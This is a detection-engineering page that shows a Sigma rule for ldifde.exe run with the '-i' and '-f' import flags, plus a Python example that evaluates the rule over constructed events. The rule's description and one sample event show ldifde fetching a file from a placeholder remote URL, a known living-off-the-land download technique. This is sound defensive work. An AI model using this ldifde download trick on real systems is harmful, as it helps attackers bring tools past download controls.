Techniques
Sample rules
Import LDAP Data Interchange Format File Via Ldifde.EXE
- source: sigma
- techniques:
  - t1105
  - t1218
Description
Detects the execution of “Ldifde.exe” with the import flag “-i”. This can be abused by passing HTTP-based arguments, which allows arbitrary files to be downloaded from a remote server.
Detection logic
selection_cli:
    CommandLine|contains|all:
        - -i
        - -f
selection_img:
    - Image|endswith: \ldifde.exe
    - OriginalFileName: ldifde.exe
condition: all of selection_*
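To show how the two selections combine (the list under selection_img is OR-ed, the condition AND-s both selections), here is an added Python example that evaluates this rule's logic over constructed process-creation events. It is not part of the Sigma rule or the Sigma project; the field names Image, OriginalFileName and CommandLine follow Sysmon-style telemetry, which is an assumption about the log source.

```python
# Added example: evaluate the Sigma detection logic above against constructed
# process-creation events. Sigma string modifiers are case-insensitive by
# default, so every comparison lowercases both sides.

def selection_cli(event: dict) -> bool:
    # CommandLine|contains|all: both "-i" (import) and "-f" (file) must appear
    cmd = event.get("CommandLine", "").lower()
    return all(token in cmd for token in ("-i", "-f"))

def selection_img(event: dict) -> bool:
    # List items under selection_img are OR-ed: either the image path ends with
    # \ldifde.exe, or the PE's OriginalFileName is ldifde.exe (covers renamed copies)
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith(r"\ldifde.exe") or original == "ldifde.exe"

def matches(event: dict) -> bool:
    # condition: all of selection_*
    return selection_cli(event) and selection_img(event)

# Constructed sample events (not real telemetry); the host and path are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\ldifde.exe", "OriginalFileName": "ldifde.exe",
     "CommandLine": r"ldifde.exe -i -f http://example.invalid/import.ldf"},   # import from URL
    {"Image": r"C:\Windows\System32\ldifde.exe", "OriginalFileName": "ldifde.exe",
     "CommandLine": r"ldifde.exe -f C:\temp\export.ldf"},                    # export only, no -i
    {"Image": r"C:\Users\u\AppData\Local\Temp\svc.exe", "OriginalFileName": "ldifde.exe",
     "CommandLine": r"svc.exe -i -f C:\temp\users.ldf"},                     # renamed binary
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"cmd.exe /c dir -i -f"},                                # flags, wrong image
]

def alerting_events(events):
    # Return only the events the rule would fire on
    return [e for e in events if matches(e)]

if __name__ == "__main__":
    for e in alerting_events(SAMPLE_EVENTS):
        print("ALERT:", e["CommandLine"])
```

Note that `contains` is a plain substring test, so an argument such as `-if` would also satisfy `-i`; that is the rule's own trade-off, not something the example tightens.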